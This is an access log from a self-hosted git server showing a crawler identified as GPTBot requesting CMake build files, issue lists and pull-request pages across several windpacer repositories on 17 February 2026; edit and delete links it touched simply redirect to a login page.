git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11238] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11200] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11231] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11237] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11231] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11289] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481900] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:18:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:11:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:11:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 